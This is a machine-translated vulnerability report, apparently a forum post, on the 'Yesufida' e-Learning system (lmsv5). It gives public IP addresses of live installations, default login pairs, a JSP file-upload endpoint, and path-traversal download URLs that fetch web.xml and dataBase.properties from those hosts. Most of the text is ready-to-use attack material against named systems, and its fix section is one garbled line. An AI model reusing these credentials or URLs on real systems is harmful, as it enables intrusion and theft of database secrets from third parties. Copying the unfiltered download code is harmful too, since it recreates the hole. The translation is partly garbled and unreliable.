Yesufida's e-Learning
There are arbitrary file uploads and arbitrary file downloads. However, a normal account can be used for Logon. Of course, we can use brute force cracking ...... If you do not have a verification code, You need to log on with a low-permission account first (no verification code is available, you have set a simple password, and you can simply drop the verification code by number)
It provides several default or simple passwords:
Http: // 58.214.233.113: 8800/lmsv5/
00041013/123456
00041014/123456
00041012/123456
Http: // 60.216.4.162: 9091/lmsv5/
107649/111111
107648/111111
107640/111111
File Upload
Http: // 60.216.4.162: 9091/lmsv5/uploadfile! LoginUploadFile. action? UploadFileType = jsp
View Source Code:
Another one:
Http: // 58.214.233.113: 8800/lmsv5/uploadfile! LoginUploadFile. action? UploadFileType = jsp
Arbitrary File Download
The official configuration is as follows:
<Action name = "downloadfile! * "Class =" cn.com. iactive. learn. res. upOrdownFile. FileDownloadAction "method =" {1} "> <! -- The Directory of the downloaded file. If not, the download is denied to ensure security, this is implemented in the action class --> <param name = "inputPath">/coursedir </param> <result name = "success" type = "stream"> <param name =" contentType "> application/octet-stream </param> <param name =" inputName "> inputStream </param> <! -- Obtain the file name dynamically --> <param name = "contentDisposition"> attachment; filename = "$ {fileName}" </param> <param name = "bufferSize"> 4096 </param> </result>
Tears flow.
Check the Code:
public InputStream getInputStream() throws Exception { int size = this.url.length() - 1; for (int i = 0; i < size; i++) this.url = this.url.replace("\\", "/"); return ServletActionContext.getServletContext().getResourceAsStream(this.url); }
What about directly using url parameters ...... No filtering at all.
Http: // 60.216.4.162: 9091/lmsv5/downloadfile! FileDownload. action? Url =/WEB-INF/web. xml & fileName =/1.xml
Http: // 60.216.4.162: 9091/lmsv5/downloadfile! FileDownload. action? Url =/WEB-INF/classes/dataBase. properties & fileName =/dataBase. properties
Another example:
Http: // 58.214.233.113: 8800/lmsv5/downloadfile! FileDownload. action? Url =/WEB-INF/web. xml & fileName =/1.xml
Http: // 58.214.233.113: 8800/lmsv5/downloadfile! FileDownload. action? Url =/WEB-INF/classes/dataBase. properties & fileName =/dataBase. properties
Solution:
File Upload: only restrictions are allowed.
File Download: Limits